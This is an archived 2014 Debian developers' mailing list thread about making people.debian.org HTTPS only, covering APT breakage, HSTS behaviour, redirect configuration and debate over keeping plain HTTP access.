Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Thu, Jul 31, 2014 at 01:26:09PM +0200, Jakub Wilk wrote: * Jakub Wilk jw...@debian.org, 2014-07-30, 22:26: WARNING: The following packages cannot be authenticated! apt-transport-https Install these packages without verification? [y/N] E: Some packages could not be authenticated [...] But if the authentication troubles are really related to the HTTP-HTTPS switch, then it's a bug in apt that should be fixed. Filed as #756614. Thanks for looking into this, There is also a minor problem when used from wheezy, putting it here so it gets indexed and more available to web searches. Using wheezy apt 0.9.7.9 in a wheezy box, # apt-get update ... Err http://people.debian.org ./ Packages 301 Moved Permanently [IP: 5.153.231.30 80] ... # apt-get install apt-transport-https ... Setting up apt-transport-https (0.9.7.9+deb7u2) ... # apt-get update Err http://people.debian.org ./ Packages 301 Moved Permanently [IP: 5.153.231.30 80] Changing http://people.debian.org to https://people.debian.org fixes the problem, once apt-transport-https is installed. Not a big problem, I do not think this worths a new bug report. -- Agustin -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140901162037.ga7...@agmartin.aq.upm.es
Re: people.debian.org will move from ravel to paradis and become HTTPS only
* Jakub Wilk jw...@debian.org, 2014-07-30, 22:26: WARNING: The following packages cannot be authenticated! apt-transport-https Install these packages without verification? [y/N] E: Some packages could not be authenticated [...] But if the authentication troubles are really related to the HTTP-HTTPS switch, then it's a bug in apt that should be fixed. Filed as #756614. -- Jakub Wilk -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140731112609.ga7...@jwilk.net
Re: people.debian.org will move from ravel to paradis and become HTTPS only
* Agustin Martin agmar...@debian.org, 2014-07-28, 13:06: This can actually lead to a weird behavior for users. In a system having something under people.debian.org in apt sources.list and apt-transport-https not installed, in today's testing upgrade, $ sudo apt-get update [...] E: The method driver /usr/lib/apt/methods/https could not be found. N: Is the package apt-transport-https installed? $ sudo apt-get install apt-transport-https Reading package lists... Done Building dependency tree Reading state information... Done The following NEW packages will be installed: apt-transport-https 0 upgraded, 1 newly installed, 0 to remove and 275 not upgraded. Need to get 132 kB of archives. After this operation, 221 kB of additional disk space will be used. WARNING: The following packages cannot be authenticated! apt-transport-https Install these packages without verification? [y/N] E: Some packages could not be authenticated I can't reproduce it here. I do get the “method driver /usr/lib/apt/methods/https could not be found” error message. But, as one would expect, it doesn't have any effect on authentication of the packages from the main archive. But if the authentication troubles are really related to the HTTP-HTTPS switch, then it's a bug in apt that should be fixed. -- Jakub Wilk -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140730202607.ga6...@jwilk.net
Re: people.debian.org will move from ravel to paradis and become HTTPS only
* Jakub Wilk jw...@debian.org, 2014-07-30, 22:26: * Agustin Martin agmar...@debian.org, 2014-07-28, 13:06: This can actually lead to a weird behavior for users. In a system having something under people.debian.org in apt sources.list and apt-transport-https not installed, in today's testing upgrade, $ sudo apt-get update [...] E: The method driver /usr/lib/apt/methods/https could not be found. N: Is the package apt-transport-https installed? $ sudo apt-get install apt-transport-https Reading package lists... Done Building dependency tree Reading state information... Done The following NEW packages will be installed: apt-transport-https 0 upgraded, 1 newly installed, 0 to remove and 275 not upgraded. Need to get 132 kB of archives. After this operation, 221 kB of additional disk space will be used. WARNING: The following packages cannot be authenticated! apt-transport-https Install these packages without verification? [y/N] E: Some packages could not be authenticated I can't reproduce it here. Scratch that. I reproduced it. Sorry for the noise. -- Jakub Wilk -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140730202924.gb6...@jwilk.net
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Tue, Jul 15, 2014 at 02:00:12PM +, Thorsten Glaser wrote: Dixi quod… Martin Zobel-Helas dixit: Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected). […] Take it as a heads-up to maybe move stuff elsewhere, if it needs http (e.g. APT repos work well via http since they use PGP for signatures). Actually, this will break most DDs’ APT repositories because apt-transport-https is usually not installed. This can actually lead to a weird behavior for users. In a system having something under people.debian.org in apt sources.list and apt-transport-https not installed, in today's testing upgrade, $ sudo apt-get update [...] E: The method driver /usr/lib/apt/methods/https could not be found. N: Is the package apt-transport-https installed? $ sudo apt-get install apt-transport-https Reading package lists... Done Building dependency tree Reading state information... Done The following NEW packages will be installed: apt-transport-https 0 upgraded, 1 newly installed, 0 to remove and 275 not upgraded. Need to get 132 kB of archives. After this operation, 221 kB of additional disk space will be used. WARNING: The following packages cannot be authenticated! apt-transport-https Install these packages without verification? [y/N] E: Some packages could not be authenticated Commenting out the people.debian.org entry leads to successful $ sudo apt-get update $ sudo apt-get install apt-transport-https and people.debian.org entry can then be re-enabled. But normal users having such entries (fortunately not many) will be puzzled by the problem. Regards, -- Agustin -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140728110647.ga22...@agmartin.aq.upm.es
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Hi! On Mon, 2014-07-21 at 19:44:18 +0200, Jakub Wilk wrote: * Peter Palfrader wea...@debian.org, 2014-07-20, 12:07: we have been moving towards https for most services over the last 12 months. Is that intentional that the http-https redirect for bugs.d.o is only temporary (302)? Should we update devscripts and python-debianbts to use HTTPS for accessing this host? I already had a queued patch to switch the remaining URLs in dpkg, like the one in the patch header template, to use https. Will try to push tomorrowish. I guess updating other packages/tools would make sense, indeed. Thanks, Guillem -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140724014911.ga6...@gaara.hadrons.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, 21 Jul 2014, Jakub Wilk wrote: * Peter Palfrader wea...@debian.org, 2014-07-20, 12:07: we have been moving towards https for most services over the last 12 months. Is that intentional that the http-https redirect for bugs.d.o is only temporary (302)? Should we update devscripts and python-debianbts to use HTTPS for accessing this host? 302 often is the default, and at least when changing configs it's a lot more forgiving to mistakes than 301. And then nobody changes it. We probably have a zoo of 301 and 302s all over. It's not entirely clear which host you mean by this, but if it's bugs then I'd say yes. If it's something else that sends HSTS headers, then also yes. If it's something else entirely, ask again? Do you plan to enable HTTPS on incoming.d.o and lintian.d.o? Lintian is now done. We haven't thought about incoming.debian.org yet - it seems a bit of a strange thing anyway. Who uses that right now, with no obvious means at all to verify the authenticity of binary packages? Cheers, -- | .''`. ** Debian ** Peter Palfrader | : :' : The universal http://www.palfrader.org/ | `. `' Operating System | `-http://www.debian.org/ -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140724055825.gh23...@anguilla.noreply.org
Re: people.debian.org redirecting browsers to HTTPS (was: people.debian.org will move from ravel to paradis and become HTTPS only)
On 07/21/2014 12:19 AM, Peter Palfrader wrote: On Sun, 20 Jul 2014, Wouter Verhelst wrote: These are all good arguments for enabling HTTPS and making it the default (which I've said repeatedly is a move that I support, or at the very least don't oppose), but not for *disabling* the possibility of plain HTTP. Pray tell: How do you make it default. - Enable HSTS on the domain - Run sed -i -e 's,http://people.debian.org,https://people.debian.org,g' over a webwml export. - Create a robots.txt file which is visible from the HTTP export (but not from the HTTPS one) which looks like this: None of these brings people who type in people.debian.org into their browser to https. This could be achieve with mod_rewrite and parsing the user agent: RewriteEngine on RewriteCond %{HTTP_USER_AGENT} ^SomeBrowser/(.*)$ RewriteRule ^(.*)$ https://test.domain.com/$1 [L,R=302] This could be implemented in the vhost directive, and makes HTTPS mandatory for the user agent SomeBrowser, the HTTP being effectively not reachable for it. Thomas Goirand (zigo) -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/53ccb2bb.6050...@debian.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Op zondag 20 juli 2014 21:22:48 schreef Peter Palfrader: On Sun, 20 Jul 2014, Wouter Verhelst wrote: If HSTS is enabled and you access people.debian.org even once (and you don't clear out their entire cache for as long as the HSTS timeout lives), then HSTS will ensure that the HTTP URL gets turned into an HTTPS URL automatically. Alas, no. Yes it does. I just tried chromium and iceweasel on this laptop (running sid, a few days out of date). Both will turn http://www.debian.org; into https://www.debian.org; due to HSTS. This works whether I enter the http://; prefix or not. Are you talking about something else? If so, can you clarify in more than two words? -- It is easy to love a country that is famous for chocolate and beer -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26 -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/2893596.xwzrmzo...@grep.be
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, July 20, 2014 21:34, Steve Langasek wrote: Because it's not an improvement to the service; it's a change that makes the *service* to Debian developers worse, for political reasons. I don't agree that it gets worse or that it is for political reasons, but even if it were, it being political does not make the reason bad per se. Telling DDs you can just host the files on your own server is missing the point of why people.debian.org exists in the first place. Well, why does it exist in the first place? Maybe it helps if we would have a clear idea of what the reason is that we offer this service. What do we expect that people use or not use it for? The project does not need to facilitate each and every thing any DD can dream up - it needs to provide those things that help develop Debian. I use project resources to work on developing our OS; I expect our services to be considerate of that use case but do not expect them to facilitate anything else. The use case broken by this change is preseeding installs over plain http from a server somewhere on the internet. I find it doubtful whether this would be something we need to be facilitating as a project. Thijs -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/9b7de801d87fd3022b628591f9c54dd5.squir...@aphrodite.kinkhorst.nl
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, Jul 21, 2014 at 5:22 PM, Wouter Verhelst wrote: Yes it does. No... I just tried chromium and iceweasel on this laptop (running sid, a few days out of date). Both will turn http://www.debian.org; into https://www.debian.org; due to HSTS. This works whether I enter the http://; prefix or not. http://www.debian.org/ does not deliver the HSTS header so it definitely isn't HSTS causing this upgrade to https. pabs@chianamo ~ $ wget http://www.debian.org/ -SO /dev/null 21 | grep Sec pabs@chianamo ~ $ wget https://www.debian.org/ -SO /dev/null 21 | grep Sec Strict-Transport-Security: max-age=5184000 -- bye, pabs https://wiki.debian.org/PaulWise -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/caktje6gsnan41yhr_ge8_mr7oo_8gtf3zlzv-tnuxycucqc...@mail.gmail.com
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Op maandag 21 juli 2014 17:39:44 schreef Paul Wise: On Mon, Jul 21, 2014 at 5:22 PM, Wouter Verhelst wrote: Yes it does. No... I just tried chromium and iceweasel on this laptop (running sid, a few days out of date). Both will turn http://www.debian.org; into https://www.debian.org; due to HSTS. This works whether I enter the http://; prefix or not. http://www.debian.org/ does not deliver the HSTS header so it definitely isn't HSTS causing this upgrade to https. Oh, I see the misunderstanding now. What I meant is, if you access people.debian.org over HTTPS even once. If you clear your cache (or do the forget this site thing in browsing history) and then explicitly enter the HTTP URL, then you asked for HTTP and it shouldn't be changed behind your back -- that would be a feature, not a bug. If you don't clear your cache after accessing people.debian.org through https, then HSTS will turn http into https until the HSTS max-age time has passed. -- It is easy to love a country that is famous for chocolate and beer -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26 -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/15147779.p75vczu...@grep.be
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, 21 Jul 2014, Wouter Verhelst wrote: Op zondag 20 juli 2014 21:22:48 schreef Peter Palfrader: On Sun, 20 Jul 2014, Wouter Verhelst wrote: If HSTS is enabled and you access people.debian.org even once (and you don't clear out their entire cache for as long as the HSTS timeout lives), then HSTS will ensure that the HTTP URL gets turned into an HTTPS URL automatically. Alas, no. Yes it does. I just tried chromium and iceweasel on this laptop (running sid, a few days out of date). Both will turn http://www.debian.org; into https://www.debian.org; due to HSTS. This works whether I enter the http://; prefix or not. Are you talking about something else? If so, can you clarify in more than two words? Sure, I can clarify: As I understand the RFC, servers MUST NOT send HSTS headers on insecure connections. Similarly, clients MUST ignore HSTS headers on insecure connections such as plain text http or if they can't validate the cert. This means that HSTS is not capable of upgrading an initial http-only connection to https. (Clients will only turn your request into https if they had previously connected via https and cached the HSTS information.) Cheers, -- | .''`. ** Debian ** Peter Palfrader | : :' : The universal http://www.palfrader.org/ | `. `' Operating System | `-http://www.debian.org/ -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140721093449.gf...@anguilla.noreply.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Op maandag 21 juli 2014 11:34:53 schreef Thijs Kinkhorst: On Sun, July 20, 2014 21:34, Steve Langasek wrote: Because it's not an improvement to the service; it's a change that makes the *service* to Debian developers worse, for political reasons. I don't agree that it gets worse You're no longer serving those who need to provide an HTTP-only link, for whatever reason. By any definition I can think of, that means you're doing less, which implies you're providing less service. or that it is for political reasons, but even if it were, it being political does not make the reason bad per se. It is if there are technical arguments against the change (there are) and there are no technical arguments in favour of the change (there aren't). The use case broken by this change is preseeding installs over plain http from a server somewhere on the internet. I find it doubtful whether this would be something we need to be facilitating as a project. If it is a set of preseed files to allow installing machines on one particular corporate network? Not so much. On the other hand, if it is a set of preseed files that change the answers of some low-priority questions (which are not ordinarily shown to the user installing a machine) so that the default behaviour of d-i changes without changing the fundamental functionality? That could be something a Debian Developer might want to provide as a service to our users, and that would require some HTTP-only webspace, preferably under the debian.org domain. One example of such a scenario would be a preseed file that preseeds the answer of passwd/make-user to false, and ensures that libnss-ldap or something similar is installed on the resulting system. This would greatly simplify installing machines without local users. Having said that, it is a fallacy to assume that just because only one example has been given, that one example is the only use case that we should consider. Here are a few others: - A company's ISP can't provide them with the bandwidth they need, so they install a transparent caching proxy to reduce bandwidth needs (this isn't specific to people.d.o, but that doesn't make it less valid). Transparently caching HTTPS is much more complex than transparently caching HTTP. - Someone broke OpenSSL (again) so that https downloads are broken, and the maintainer puts a (gpg-signed) patch up on their people.d.o space (or posts a message to a mailinglist; but lists.debian.org already is https-only apparently, so that doesn't help for people who aren't subscribed) - You are somewhere with extremely bad connectivity (say, in Wall Street during rush hour) where you need to look up/review some documentation before a meeting, and your SSL connections keep timing out. - You want to download a large file that is provided along with an md5sum and a GnuPG signature onto a resource-strapped device (say, a raspberry pi) which can't decrypt at link speed, and you don't like waiting. Need more? I can come up with more, but that would be missing the point. The point isn't that we should continue supporting HTTP because scenario X, Y, or Z. The point is that we should continue supporting HTTP because it doesn't buy us anything not to, while it may cost our users and our developers something they could do beforehand but can't do right now anymore. If you can come up with a scenario where an attack to the *project* would be prevented by providing an HTTPS-only people.debian.org, *then* I would agree that disabling HTTP is a good move. But I don't think that it's possible to come up with such a scenario, simply because you're providing static files which anyone can download. The only security benefit to be had is at the client side. In fact, due to the fact that TLS is a complex protocol which uses a number of rather complex algorithms, there's a lot that can go wrong with security in TLS which can't go wrong with plain HTTP, and which would *reduce* the security of the project. That this isn't just a hypothetical scenario is proven by the heartbleed bug of a few months ago. As with any security-related choice, choosing between HTTP and HTTPS involves a trade-off of features and convenience versus security. In most cases, security should win out, and for that reason I agree that making HTTPS the default (insofar as that is possible) could be a good thing to do. However, since the only security benefit to be had in enabling HTTPS for static files is at the client side, I think it's only fair to *allow* the client to make that tradeoff and decide that in this one particular case, disabling HTTPS is the right thing to do. By redirecting all HTTP requests to HTTPS, you're denying clients that choice, and thus are reducing the level of service that you provide them. -- It is easy to love a country that is famous for chocolate and beer -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26 -- To UNSUBSCRIBE, email to
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Op maandag 21 juli 2014 11:34:49 schreef Peter Palfrader: On Mon, 21 Jul 2014, Wouter Verhelst wrote: Are you talking about something else? If so, can you clarify in more than two words? Sure, I can clarify: As I understand the RFC, servers MUST NOT send HSTS headers on insecure connections. Similarly, clients MUST ignore HSTS headers on insecure connections such as plain text http or if they can't validate the cert. This means that HSTS is not capable of upgrading an initial http-only connection to https. (Clients will only turn your request into https if they had previously connected via https and cached the HSTS information.) Yes, that's my understanding too. As I've said in my reply to Paul's mail, what I meant is that if a user has seen an HSTS header even once, then my statement is true. As such, what you need is to improve the likelihood that the initial connection is an https one, not an http-only one. I do think that the things I've suggested (instruct search engines to ignore http, only provide https links from project resources, etc) will increase that likelihood to the extent that http-only connections will be a rare exception. You can probably increase it even more with some effort, I'm sure. Is that enough? That's a matter of opinion. I would think it is. -- It is easy to love a country that is famous for chocolate and beer -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26 -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/8110293.d4xlpoy...@grep.be
myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
Hi Iain, On Sonntag, 20. Juli 2014, Iain R. Learmonth wrote: The main one is that there are places in the world you just can't use HTTPS for legal reasons [...] I'm curious, can you name one? cheers, Holger signature.asc Description: This is a digitally signed message part.
Re: myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, Jul 21, 2014 at 01:12:37PM +0200, Holger Levsen wrote: Hi Iain, On Sonntag, 20. Juli 2014, Iain R. Learmonth wrote: The main one is that there are places in the world you just can't use HTTPS for legal reasons [...] I'm curious, can you name one? The United Kingdom when using IPv4 over AX.25 on Amateur Radio. Encryption is illegal because it goes against the self-policing nature of the amateur bands. (I was hoping to actually locate one of the crackpot dictator countries that have laws for the general population but there doesn't actually seem to be much data available on that). http://www.ru.j-npcs.org/usoft/WWW/www_debian.org/Documentation/policy.html/ch-developer.html Note that for packaging, these allowances are made. I do not see why we cannot make the same allowances for accessing a website. Iain. -- e: i...@fsfe.orgw: iain.learmonth.me x: i...@jabber.fsfe.org t: +447875886930 c: MM6MVQ g: IO87we p: 1F72 607C 5FF2 CCD5 3F01 600D 56FF 9EA4 E984 6C49 pgpByqJQt6eFg.pgp Description: PGP signature
Re: myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
Hi, On Montag, 21. Juli 2014, Iain R. Learmonth wrote: The United Kingdom when using IPv4 over AX.25 on Amateur Radio. Encryption is illegal because it goes against the self-policing nature of the amateur bands. and so are probably prison inmates, workers of armed forces and other who might be legally binded due to work contracts. IMO not really a compelling argument for the rest of the world. http://www.ru.j-npcs.org/usoft/WWW/www_debian.org/Documentation/policy.html /ch-developer.html Note that for packaging, these allowances are made. I do not see why we cannot make the same allowances for accessing a website. that policy copy you are refering to states version 2.1.2.2 (dpkg 1.4.0.5), 5 December 1996 in the footer, while we currently use version 3.9.5.0, 2013-10-28, and, yes, the world has changed. cheers, Holger signature.asc Description: This is a digitally signed message part.
Re: myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
On 7/21/14, Holger Levsen hol...@layer-acht.org wrote: Hi Iain, On Sonntag, 20. Juli 2014, Iain R. Learmonth wrote: The main one is that there are places in the world you just can't use HTTPS for legal reasons [...] I'm curious, can you name one? I'm also curious - is there a Debian developer who will not use HTTPS but does use SSH to access servers? Is Debian still offering telnet services too? What other unsafe protocols are standard and in use? All the best, Jacob -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/cafggdf2pnzk17uzkfh-hekv2-kyvxh9+qihvzltgmdtjrrr...@mail.gmail.com
Re: myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
On 7/21/14, Iain R. Learmonth i...@fsfe.org wrote: On Mon, Jul 21, 2014 at 01:12:37PM +0200, Holger Levsen wrote: Hi Iain, On Sonntag, 20. Juli 2014, Iain R. Learmonth wrote: The main one is that there are places in the world you just can't use HTTPS for legal reasons [...] I'm curious, can you name one? The United Kingdom when using IPv4 over AX.25 on Amateur Radio. Encryption is illegal because it goes against the self-policing nature of the amateur bands. I believe you are mistaken. My understanding is that you're not supposed to use crypto on the radio layer and IP packets are already several layers away from that concern. It would be great to hear from a HAM radio literate lawyer on this topic. Perhaps someone can ask the EFF if it is actually an important sticking point? More importantly, I suspect would be to first ask if anyone in the UK uses IPv4 over AX.25 to access people.debian.org? (I was hoping to actually locate one of the crackpot dictator countries that have laws for the general population but there doesn't actually seem to be much data available on that). Isn't any country that outlaws use of crypto by free people by definition a crackpot country? :-) All the best, Jacob -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/cafggdf0p5nqvjvmkhysrpr81kuurhsvsvas_d22wpvwewrp...@mail.gmail.com
Re: myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, Jul 21, 2014, at 13:12, Holger Levsen wrote: Hi Iain, On Sonntag, 20. Juli 2014, Iain R. Learmonth wrote: The main one is that there are places in the world you just can't use HTTPS for legal reasons [...] I'm curious, can you name one? http://en.wikipedia.org/wiki/Restrictions_on_the_import_of_cryptography And http://www.cryptolaw.org/cls2.htm The usual suspects: Belarus, Iran, Saudi Arabia (and I guess North Korea, but the use of crypto is probably OK if you are allowed to use a computer and connect to outside of the world anyway...) But again this should not be a reason to not deploy encryption everywhere. The current problem with HTTPS is that it bundles encryption with authenticity. This needs to be unbundled[1]. My opinion is that even a transparent opportunistic encryption (f.e. like DANE implementation in postfix) would improve the overall state of security. 1. I must admit that I haven't been able to monitor httpbis progress on this topic. Ondrej -- Ondřej Surý ond...@sury.org Knot DNS (https://www.knot-dns.cz/) – a high-performance DNS server -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/1405949524.7249.143937105.648e1...@webmail.messagingengine.com
Re: myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
Hi Jacob, On Mon, Jul 21, 2014 at 01:14:14PM +, Jacob Appelbaum wrote: I believe you are mistaken. My understanding is that you're not supposed to use crypto on the radio layer and IP packets are already several layers away from that concern. It would be great to hear from a HAM radio literate lawyer on this topic. Perhaps someone can ask the EFF if it is actually an important sticking point? I am not a lawyer but I am a radio amateur. Here is a link to the Ofcom Amateur Radio terms: https://services.ofcom.org.uk/amateur-terms.pdf 11(2) The Licensee shall only address Messages to other Amateurs or to the stations of those Amateurs and shall not encrypt these Messages for the purpose of rendering the Message unintelligible to other radio spectrum users. I would take this to mean that no part of the message can be encrypted. More importantly, I suspect would be to first ask if anyone in the UK uses IPv4 over AX.25 to access people.debian.org? This is not beyond the realm of possibility. It would be permitted by the Ofcom terms to download Amateur Radio software from p.d.o and also to browse Amateur Radio software documentation hosted there, which are both things that the Debian policy would permit to be hosted. There are likely also other cases, which granted are likely edge cases, where encryption cannot be used. Isn't any country that outlaws use of crypto by free people by definition a crackpot country? :-) Indeed. Iain. -- e: i...@fsfe.orgw: iain.learmonth.me x: i...@jabber.fsfe.org t: +447875886930 c: MM6MVQ g: IO87we p: 1F72 607C 5FF2 CCD5 3F01 600D 56FF 9EA4 E984 6C49 pgpefSuwPJmwF.pgp Description: PGP signature
Re: myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, Jul 21, 2014 at 9:32 PM, Ondřej Surý wrote: The current problem with HTTPS is that it bundles encryption with authenticity. This needs to be unbundled[1]. My opinion is that even a transparent opportunistic encryption (f.e. like DANE implementation in postfix) would improve the overall state of security. The closest thing appears to be https-finder+https-everywhere+tor: https://packages.debian.org/sid/xul-ext-https-finder https://packages.debian.org/sid/xul-ext-https-everywhere https://packages.debian.org/sid/torbrowser-launcher -- bye, pabs https://wiki.debian.org/PaulWise -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/CAKTje6Eb5Dr+0ADbNROE2i=NvyNj6bVGxBHJX050fH=peks...@mail.gmail.com
Re: myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
On 7/21/14, Iain R. Learmonth i...@fsfe.org wrote: Hi Jacob, On Mon, Jul 21, 2014 at 01:14:14PM +, Jacob Appelbaum wrote: I believe you are mistaken. My understanding is that you're not supposed to use crypto on the radio layer and IP packets are already several layers away from that concern. It would be great to hear from a HAM radio literate lawyer on this topic. Perhaps someone can ask the EFF if it is actually an important sticking point? I am not a lawyer but I am a radio amateur. Here is a link to the Ofcom Amateur Radio terms: https://services.ofcom.org.uk/amateur-terms.pdf 11(2) The Licensee shall only address Messages to other Amateurs or to the stations of those Amateurs and shall not encrypt these Messages for the purpose of rendering the Message unintelligible to other radio spectrum users. It sounds like it would be good to call and clarify things with a technologically literate lawyer. I would take this to mean that no part of the message can be encrypted. By that reasoning, we may not authenticate except by sending plaintext passwords over such a network. That seems to either be an old policy, a mistake or a network that is simply hostile towards modern security requirements for individuals. This seems to be relevant: https://www.tapr.org/pdf/DCC2010-AX.25-AuthenticationEffects-KE5LKY.pdf More importantly, I suspect would be to first ask if anyone in the UK uses IPv4 over AX.25 to access people.debian.org? This is not beyond the realm of possibility. I acknowledge the possibility and was inquring about *actuality* rather than mere possibility. Is anyone actually using IPv4 over AX.25 to access people.debian.org? It would be permitted by the Ofcom terms to download Amateur Radio software from p.d.o and also to browse Amateur Radio software documentation hosted there, which are both things that the Debian policy would permit to be hosted. Is anyone hosting software on p.d.o and actually having it downloaded over a radio link? That sounds like a good project but I wonder if practically it happens in the wild? There are likely also other cases, which granted are likely edge cases, where encryption cannot be used. We should not be beholden to the lowest common denominator. This seems especially so when it is a matter of theory and without practical issue. All the best, Jacob -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/cafggdf0ob2hulvncvwy_u8pf_rdbz9ynstjl5oyiwsce0ix...@mail.gmail.com
Re: myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, Jul 21, 2014 at 02:38:14PM +, Jacob Appelbaum wrote: On 7/21/14, Iain R. Learmonth i...@fsfe.org wrote: By that reasoning, we may not authenticate except by sending plaintext passwords over such a network. That seems to either be an old policy, a mistake or a network that is simply hostile towards modern security requirements for individuals. I would say that a message digest to authenticate a message doesn't obscure its meaning for other amateurs as others could use it to verify the same message in the same way as the intended recipient. If SSL were used only for authentication, using a NULL cipher, then I would think that would be allowed, but also I would question any webserver that has SSL enabled with a NULL cipher also enabled. Remember, I'm not asking for HTTPS to not be default, just for an alternative VHOST name to be available without HTTPS. Users would have to be explicitly asking for it and it's only a few lines of Apache configuration to set up. Is anyone hosting software on p.d.o and actually having it downloaded over a radio link? That sounds like a good project but I wonder if practically it happens in the wild? This is probably something I would have done, as I'm just getting back into amateur radio. I have not done it yet though. I would be interested to hear if there are any use cases out there. I bet they are part of rather cool projects. We should not be beholden to the lowest common denominator. This seems especially so when it is a matter of theory and without practical issue. This is not what I'm asking for, just a seperate VHOST for those that want to use it. Of course, it's probably trivial to set up an HTTP service that proxies to the HTTPS one, but it's even more trivial to add those few lines of config to add a VHOST on the new machine. Iain. -- e: i...@fsfe.orgw: iain.learmonth.me x: i...@jabber.fsfe.org t: +447875886930 c: MM6MVQ g: IO87we p: 1F72 607C 5FF2 CCD5 3F01 600D 56FF 9EA4 E984 6C49 pgpj9UUcuMOJw.pgp Description: PGP signature
RFH Packaging DNSSEC/TLSA Validator (Was: people.debian.org will move from ravel to paradis and become HTTPS only)
Hi, On Sun, Jul 20, 2014, at 08:47, Tollef Fog Heen wrote: Not many HTTP clients support DANE, unfortunately, and MITM-ing DNSSEC-secured domains is a bit more effort than just MITM-ing a plaintext HTTP connection. my team has just produced js-types version of DNSSEC/TLSA Validator so it won't break with recent Mozilla changes. (Should be published soon at www.dnssec-validator.cz - I have a RC binary if you are interested.) Would there be somebody willing to help me with packaging? I have never packaged xul plugin, so it probably would be faster if there's somebody with *free time* (that I also lack) and skill. We have also got rid of FireBreath framework and other stuff, so the packaging should be much easier now. I will stay on packaging team, I just need a kick-off (or a least a tip for good existing package I can canibalize...) Ondrej -- Ondřej Surý ond...@sury.org Knot DNS (https://www.knot-dns.cz/) – a high-performance DNS server -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/1405956064.22784.143988757.47da5...@webmail.messagingengine.com
Re: myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
